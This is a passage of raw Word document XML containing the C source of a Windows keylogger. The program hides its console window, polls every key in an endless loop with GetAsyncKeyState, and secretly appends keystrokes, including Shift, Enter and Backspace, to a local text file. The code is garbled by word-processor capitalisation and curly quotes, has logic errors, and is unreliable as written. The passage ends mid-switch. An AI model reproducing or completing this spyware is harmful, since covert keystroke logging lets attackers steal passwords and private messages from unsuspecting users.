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27F5" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t>#include &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>windows.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758EA284" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t>#include &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stdio.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFD8AD9" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t>#include &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>winuser.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C4B26C" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Int</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> main()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFDC25C" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E161730" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">    HWND stealth;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60848F7C" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AllocConsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58817C69" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">    Stealth=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FindWindowA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ConsoleWindowClass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>”,NULL);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8EA55A" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ShowWindow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(stealth,0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6A6C66" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5"/>
    <w:p w14:paraId="06CD64E4" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">    FILE *file;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A43E85" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">    File=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fopen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>file.txt”,”a</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>+”);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FF36EE" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">    Short character;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EB0E4B" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">    While(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2890382D" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">    {     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC7E386" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">        For(character=8;character&lt;=222;character++)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727068F6" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D77AB0A" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">            If(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GetAsyncKeyState</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(character)==-32767)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E97A45" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62048886" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                FILE *file;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F66640" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                File=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fopen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>file.txt”,”a</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>+”);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BDA2D5" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                If(file==NULL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031C8958" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CD9EC7" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                    Return 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03511FC6" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3CB37D" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                If(file!=NULL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BEA3F8" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA53E9A" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                   If((character&gt;64)&amp;&amp;(character&lt;91)&amp;&amp; !(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GetAsyncKeyState</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(0x10)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275F8E29" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DD8A2C" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                        Character+=32;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290A7435" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Fputc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>character,file</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1118CDE7" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Fclose</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(file);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9FD6AE" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                        Break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FBC128" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                    } </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222DDD3F" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                    Else if(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GetAsyncKeyState</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(VK_CAPITAL)==0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548D78D3" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                    { if((character&gt;=64)&amp;&amp;(character&lt;=91))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526126AB" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                    {   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74155D29" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Fputc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>character,file</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A3F570" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Fclose</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(file);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170BBA28" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                        Break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F15CBC" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                    }  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417F67B9" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBAEC5D" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                    Else if (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GetAsyncKeyState</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(0x10))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510A828D" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                    {  if((character&gt;=64)&amp;&amp;(character&lt;=91))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3F421A" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                        {   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D7A1FB" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Fputc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>character,file</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6DFF69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79EC4831" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            Break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789A72F6" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                        }  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58394E9D" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2989B1A2" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                    Else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22704A1A" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D78E67" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                        Switch(character)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107EDFC9" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5BD7BE" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            Case VK_SPACE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547076EE" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Fputc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(‘ ‘,file);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798F594E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0B62052B" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            Break;    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6CF173" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            Case VK_SHIFT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5077B6C5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(“[SHIFT]”,file);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAB9649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20B12585" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            Break;                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F91F3B" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            Case VK_RETURN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2FF1F3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(“\r[ENTER]\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>r”,file</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7061D71C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74863339" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            Break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B67FAAE" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            Case VK_BACK:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F08D17C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(“\r[BACKSPACE]\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>r”,file</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50594794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0C1BE830" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            Break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A730BD" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            Case VK_TAB:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A057816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(“\r[TAB]\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>r”,file</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDCAB06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5299E683" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            Break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752D078E" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            Case VK_CONTROL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B87B5DD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(“\r[CTRL]\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>r”,file</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0058D30E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6AA5658C" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            Break;    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6635A52B" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            Case VK_DELETE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330E4DC5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(“\r[DEL]\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>r”,file</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CA4EAA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5A38B044" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            Break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCEF8BE" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            Case VK_ESCAPE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E297B45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(“\r[ESC]\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>r”,file</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786AF5A2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3A5E3373" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            Break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE89652" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            Case VK_UP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DBB5EF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(“\r[UP]\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>r”,file</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DF6C1D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704369A7" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            Break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653912B1" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            Case VK_RIGHT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598F0736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(“\r[RIGHT]\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>r”,file</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F148692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317B74B8" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            Break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68397CF9" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            Case VK_DOWN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007C5D43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(“\r[DOWN]\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>r”,file</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E129008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692C61B1" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            Break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AC9FFC" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            Case VK_LEFT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07827AD7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(“\r[LEFT]\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>r”,file</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33AF39FC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64505502" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            Break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DA0D1B" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6035CDC7" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            Case 190 || 110:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2426A2" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Fputs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(“[.]”,file);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EAD871" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Fclose</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(file);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407E1462" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            Break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE0C952" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5"/>
    <w:p w14:paraId="2D9820D6" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            Case 48:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4030879C" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CF4BA8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4B9639A8" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                                {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2EC2C3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(“)”,file);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F29FC9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27E8BFE8" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2716F19D" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                                Else </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363FCEB4" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                                {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E9B1D9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(“0”,file);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48589F3C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0AE18CA1" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DCA913" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714EF44C" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            Break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFF02DD" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            Case 49:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1DD0D8" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                            {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E1D259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4A4F7F0B" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                                {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C9933F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(“!”,file);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E22D850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79D15BA3" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB56F9A" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                                Else </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E875CA9" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
        <w:t xml:space="preserve">                                {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FA80A8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(“1”,file);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A268EE4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24447CD9" w14:textId="77777777" w:rsidR="00932AE5" w:rsidRDefault="00932AE5">
      <w:r>
